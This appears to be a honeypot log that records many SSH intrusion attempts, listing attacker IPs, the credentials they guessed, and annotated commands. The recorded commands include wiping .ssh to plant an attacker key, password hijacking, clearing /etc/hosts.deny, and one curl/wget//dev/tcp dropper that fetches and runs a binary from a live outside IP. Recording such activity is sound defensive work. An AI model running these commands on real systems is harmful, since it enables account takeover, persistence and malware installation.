$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_44 (103.226.139.207) — Cicurug, Indonesia · 2 sessions · 40 cmds

2026-04-18 09:07 EDT · as deploy/deploy, oracle/oracle19!

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv..." → cat /proc/cpuinfo | grep name | wc

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l ×2

↳ CPU profiling

$ echo -e "deploy\nRErWW1hFCeDY\nRErWW1hFCeDY"|passwd|bash

$ Enter new UNIX password: ×2

$ echo "deploy\nRErWW1hFCeDY\nRErWW1hFCeDY\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ×2

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ×2

$ ls -lh $(which ls) ×2

$ which ls ×2

$ crontab -l ×2

↳ persistence setup

$ w ×2

↳ logged-in users check

$ uname -m ×2

$ cat /proc/cpuinfo | grep model | grep name | wc -l ×2

↳ CPU profiling

$ top ×2

↳ process monitoring

$ uname ×2

↳ OS identification

$ uname -a ×2

↳ OS/kernel identification

$ whoami ×2

↳ privilege check

$ lscpu | grep Model ×2

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ×2

$ echo -e "oracle19!\n5HnSQzahuH7q\n5HnSQzahuH7q"|passwd|bash

$ echo "oracle19!\n5HnSQzahuH7q\n5HnSQzahuH7q\n"|passwd

🎭 wraith_root_16 (165.154.6.26) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-18 09:22 EDT · as oracle/Bmw_20!_^

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_32 (103.161.170.12) — Hanoi, Vietnam · 1 session · 2 cmds

2026-04-18 09:08 EDT · as oracle/Bmw_20!_^

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_11 (59.36.75.227) — Shenzhen, China · 1 session · 20 cmds

2026-04-18 08:58 EDT · as deploy/deploy123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "deploy123\nWEfZAz9kIxLj\nWEfZAz9kIxLj"|passwd|bash

$ Enter new UNIX password:

$ echo "deploy123\nWEfZAz9kIxLj\nWEfZAz9kIxLj\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wok_root_16 (182.92.94.183) — Beijing, China · 1 session · 1 cmd

2026-04-18 06:11 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 rogue_root_34 (102.208.216.221) — Johannesburg, South Africa · 1 session · 19 cmds

2026-04-18 05:54 EDT · as root/admin123

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:Gwm5bzEsnlwU"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 moose_root_5 (159.203.2.155) — Toronto, Canada · 1 session · 2 cmds

2026-04-18 05:49 EDT · as oracle/oracle22!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 eagle_root_5 (70.114.116.180) — Hutto, United States · 1 session · 19 cmds

2026-04-18 05:26 EDT · as root/admin123

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:TiOFuCk31LIr"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 hanbok_sol (14.63.196.175) — Seongnam-si, South Korea · 2 sessions · 22 cmds

2026-04-16 04:49 EDT · as eth/eth, oracle/oracle!@#$

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "eth\nmttfFj7YZZQW\nmttfFj7YZZQW"|passwd|bash

$ Enter new UNIX password:

$ echo "eth\nmttfFj7YZZQW\nmttfFj7YZZQW\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 panda_root_7 (14.103.117.81) — Beijing, China · 1 session · 20 cmds

2026-04-18 02:43 EDT · as oracle/Oracle05!

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → cat /proc/cpuinfo | grep name | wc

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Oracle05!\nF0UaVyrCDB0U\nF0UaVyrCDB0U"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle05!\nF0UaVyrCDB0U\nF0UaVyrCDB0U\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 capoeira_root (189.8.5.118) — São Paulo, Brazil · 2 sessions · 22 cmds

2026-04-15 06:44 EDT · as oracle/oracle19, ubuntu/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nX8ckVHNmt3MP\nX8ckVHNmt3MP"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nX8ckVHNmt3MP\nX8ckVHNmt3MP\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_18 (165.154.6.116) — Hong Kong, Hong Kong · 1 session · 20 cmds

2026-04-18 02:22 EDT · as ubuntu/password

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo -e "password\nOqZtBR0njHKF\nOqZtBR0njHKF"|passwd|bash →

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nOqZtBR0njHKF\nOqZtBR0njHKF"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nOqZtBR0njHKF\nOqZtBR0njHKF\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_sol_2 (46.151.182.2) — Kyiv, Ukraine · 22 sessions · 22 cmds

2026-04-03 03:27 EDT · as deploy/deploy, guest/guest, mysql/mysql

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×22

🎭 specter_root_38 (36.64.174.210) — Jakarta, Indonesia · 1 session · 2 cmds

2026-04-18 01:14 EDT · as root/root

ip → network mapping

$ /ip cloud print

$ ifconfig

↳ network mapping

🎭 wok_root_17 (115.231.76.176) — Jiaxing, China · 1 session · 5 cmds

2026-04-18 00:54 EDT · as root/123456

echo → payload download from C2 → execute from /tmp → '8

$ echo 1 > /dev/null && cat /bin/echo

$ nohup $SHELL -c "curl http://47.238.85.17:7078/linux -o /tmp/UwYQrrd98x; if [ ! -f /tmp/UwYQrrd98x ]; then wget http://47.238.85.17:7078/linux -O /tmp/UwYQrrd98x; fi; if [ ! -f /tmp/UwYQrrd98x ]; then exec 6<>/dev/tcp/47.238.85.17/7078 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/UwYQrrd98x ; chmod +x /tmp/UwYQrrd98x && /tmp/UwYQrrd98x AJ4XFoiet7ZWzWfMMdVowki5vIySFg2MdXOQFhmIlLC0TsVj0jnCattKv7yClBMWkHVzhBURl5y1rk7FfNAw13zHTLaqm5YbFY10c54SE5aCtbdO22PXM8xjx0K4tJ2WFAOKeG+MEBOInrS/Vsdi0jrbZ8JJrrKciBAUjm9zixAPkZu+uEjEYtcg1GLbSr6xgpQUF5Bwco8ZF56esq5LzHzbN8xgwU6gtp6RGxqIcHKeEhCVgrW3VsRi2y7TYcJCubSYlQEXiW95iA0Tn4K1uUjPZNIx02vVTLmqnpUYDY94cJASFpGWsrxPxXLWN8xqw1a9t4KXGBaEd3GPEBGGnbS/Vsdi0y7QZsxWv7SYnBgRinVhhg0Tl5Sqv0rFfNM32mjCT7u1jJcQFpBzco8NFpCCtblOz2TSMdJn1Um+t4KREw2PdXaQERCRlry7QMVy1jfMYMFLoLWekQ8SinF7iBMQkp+kv0nDfNAz1HzESL2qnZYZGYhxcI4WAZKfqr9OxHzQM9J8x0y4vpSXFBCecHOPDRWXgrC+VsRj0DraYMZJrreViBATjG95iw0ZkZa9t0zMctY3zGDBS6C2nJ4PEI57eY0RGIadsbpWw3zTMdt8xE+/vpuRExaeeW+MEhaIn7agScJn2DfTYMdYurOCnhcNjHhvjxQRnJq0v0nMctYzzGPGQKC1mp4PGo57dooUFIadtL9Wx2LTLtBmzFa/tJicGBGKdWGPERGInb24VsRn0S7TYM9OvrWckwEXiW9zihEPl5u9oEzCaNQw1mYfa3LwTUrlNWjTI31tn3EmELth5uvRUdVeYns=; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/UwYQrrd98x && /tmp/UwYQrrd98x AJ4XFoiet7ZWzWfMMdVowki5vIySFg2MdXOQFhmIlLC0TsVj0jnCattKv7yClBMWkHVzhBURl5y1rk7FfNAw13zHTLaqm5YbFY10c54SE5aCtbdO22PXM8xjx0K4tJ2WFAOKeG+MEBOInrS/Vsdi0jrbZ8JJrrKciBAUjm9zixAPkZu+uEjEYtcg1GLbSr6xgpQUF5Bwco8ZF56esq5LzHzbN8xgwU6gtp6RGxqIcHKeEhCVgrW3VsRi2y7TYcJCubSYlQEXiW95iA0Tn4K1uUjPZNIx02vVTLmqnpUYDY94cJASFpGWsrxPxXLWN8xqw1a9t4KXGBaEd3GPEBGGnbS/Vsdi0y7QZsxWv7SYnBgRinVhhg0Tl5Sqv0rFfNM32mjCT7u1jJcQFpBzco8NFpCCtblOz2TSMdJn1Um+t4KREw2PdXaQERCRlry7QMVy1jfMYMFLoLWekQ8SinF7iBMQkp+kv0nDfNAz1HzESL2qnZYZGYhxcI4WAZKfqr9OxHzQM9J8x0y4vpSXFBCecHOPDRWXgrC+VsRj0DraYMZJrreViBATjG95iw0ZkZa9t0zMctY3zGDBS6C2nJ4PEI57eY0RGIadsbpWw3zTMdt8xE+/vpuRExaeeW+MEhaIn7agScJn2DfTYMdYurOCnhcNjHhvjxQRnJq0v0nMctYzzGPGQKC1mp4PGo57dooUFIadtL9Wx2LTLtBmzFa/tJicGBGKdWGPERGInb24VsRn0S7TYM9OvrWckwEXiW9zihEPl5u9oEzCaNQw1mYfa3LwTUrlNWjTI31tn3EmELth5uvRUdVeYns=" &

↳ payload download from C2

$ head -c 3716336 > /tmp/28WHQe8XOR

↳ execute from /tmp

$ echo 1 > /dev/null && cat /bin/echoQtd#0000

$ >A@/`'8

🎭 panda_root_8 (14.103.117.97) — Beijing, China · 1 session · 1 cmd

2026-04-17 22:47 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 specter_root_22 (185.239.84.249) — Hong Kong, Hong Kong · 2 sessions · 4 cmds

2026-04-12 02:23 EDT · as oracle/Oracle2026!@#, oracle/oracle@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 eagle_root_10 (69.149.23.135) — Atlanta, United States · 3 sessions · 6 cmds

2026-04-16 12:42 EDT · as oracle/oracle11!, oracle/oracle17, oracle/oracle@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 yankee_sol (92.118.39.87) — Dallas, United States · 2150 sessions · 2150 cmds

2026-02-28 06:39 EST · as sol/123, sol/sol, solana/solana

Ran uname 2602x across 2602 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2150

↳ obfuscated system check

🎭 phantom_root_26 (128.1.131.163) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-17 20:55 EDT · as oracle/oracle@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

